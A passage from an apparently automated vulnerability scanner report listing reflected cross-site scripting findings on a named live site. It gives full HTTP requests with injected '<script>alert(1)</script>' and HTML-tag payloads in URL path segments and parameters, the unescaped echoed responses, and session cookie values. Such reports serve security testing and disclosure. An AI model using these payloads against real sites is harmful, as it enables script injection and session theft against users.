The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8da9e<a>6b554553757 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/358da9e<a>6b554553757/awempire-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/358da9e<a>6b554553757/awempire-com.html was not found on this server.</p>
...[SNIP]...

2.2348. http://www.resellerbase.com/detail/35/awempire-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/awempire-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cfe79<script>alert(1)</script>28083edb9c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/cfe79<script>alert(1)</script>28083edb9c1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/cfe79<script>alert(1)</script>28083edb9c1 was not found on this server.</p>
...[SNIP]...

2.2349. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc1b8<script>alert(1)</script>a0032ab6162 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfc1b8<script>alert(1)</script>a0032ab6162/35/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfc1b8<script>alert(1)</script>a0032ab6162/35/rating.php was not found on this server.</p>
...[SNIP]...

2.2350. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7282e<script>alert(1)</script>e57bd8ccd71f1eeaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail7282e<script>alert(1)</script>e57bd8ccd71f1eeaf/35/rating.php?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7282e<script>alert(1)</script>e57bd8ccd71f1eeaf/35/rating.php?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2351. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ed90<script>alert(1)</script>c0d368eca884005e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/354ed90<script>alert(1)</script>c0d368eca884005e2/rating.php?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/354ed90<script>alert(1)</script>c0d368eca884005e2/rating.php?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2352. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2a96<script>alert(1)</script>601ea4ee280 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35e2a96<script>alert(1)</script>601ea4ee280/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35e2a96<script>alert(1)</script>601ea4ee280/rating.php was not found on this server.</p>
...[SNIP]...

2.2353. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1c5d<script>alert(1)</script>b825bd0dc2e778375 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/35/rating.phpd1c5d<script>alert(1)</script>b825bd0dc2e778375?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.phpd1c5d<script>alert(1)</script>b825bd0dc2e778375?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2354. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload afcff<script>alert(1)</script>843aac5b5ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/rating.phpafcff<script>alert(1)</script>843aac5b5ef HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.phpafcff<script>alert(1)</script>843aac5b5ef was not found on this server.</p>
...[SNIP]...

2.2355. http://www.resellerbase.com/detail/35/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0a48<script>alert(1)</script>b78a42aadb59ac196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/35/rating.php/c0a48<script>alert(1)</script>b78a42aadb59ac196?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.php/c0a48<script>alert(1)</script>b78a42aadb59ac196?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2356. http://www.resellerbase.com/detail/35/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a8830<script>alert(1)</script>9741e0d1b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/rating.php?a8830<script>alert(1)</script>9741e0d1b8d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.php?a8830<script>alert(1)</script>9741e0d1b8d=1 was not found on this server.</p>
...[SNIP]...

2.2357. http://www.resellerbase.com/detail/35/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9afb7<script>alert(1)</script>46d0b782ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9afb7<script>alert(1)</script>46d0b782ee/35/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9afb7<script>alert(1)</script>46d0b782ee/35/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2358. http://www.resellerbase.com/detail/35/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef179<script>alert(1)</script>71b7e6084df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35ef179<script>alert(1)</script>71b7e6084df/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35ef179<script>alert(1)</script>71b7e6084df/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2359. http://www.resellerbase.com/detail/35/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2216b<script>alert(1)</script>46bb0c96031 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/search.php2216b<script>alert(1)</script>46bb0c96031?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php2216b<script>alert(1)</script>46bb0c96031?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2360. http://www.resellerbase.com/detail/35/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload da533<a>3aa991d5252 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/search.php?keyword=search...&Submit3=Searchda533<a>3aa991d5252&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...&Submit3=Searchda533<a>3aa991d5252&opt=2 was not found on this server.</p>
...[SNIP]...

2.2361. http://www.resellerbase.com/detail/35/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f1444<a>54d2c1d38b6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/search.php?keyword=search...f1444<a>54d2c1d38b6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...f1444<a>54d2c1d38b6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2362. http://www.resellerbase.com/detail/35/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8cdc2<script>alert(1)</script>d16fd1f45d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/search.php?keyword=search...&Submit3=Search&opt=2&8cdc2<script>alert(1)</script>d16fd1f45d9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...&Submit3=Search&opt=2&8cdc2<script>alert(1)</script>d16fd1f45d9=1 was not found on this server.</p>
...[SNIP]...

2.2363. http://www.resellerbase.com/detail/35/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a1060<a>e563294da6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/search.php?keyword=search...&Submit3=Search&opt=2a1060<a>e563294da6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...&Submit3=Search&opt=2a1060<a>e563294da6 was not found on this server.</p>
...[SNIP]...

2.2364. http://www.resellerbase.com/detail/35/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5c8e<script>alert(1)</script>e43131ce73a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile5c8e<script>alert(1)</script>e43131ce73a/35/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile5c8e<script>alert(1)</script>e43131ce73a/35/themes/ was not found on this server.</p>
...[SNIP]...

2.2365. http://www.resellerbase.com/detail/35/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8825<script>alert(1)</script>05241d88c4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35c8825<script>alert(1)</script>05241d88c4c/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35c8825<script>alert(1)</script>05241d88c4c/themes/ was not found on this server.</p>
...[SNIP]...

2.2366. http://www.resellerbase.com/detail/35/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7e18<script>alert(1)</script>c8feaa9ba92 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

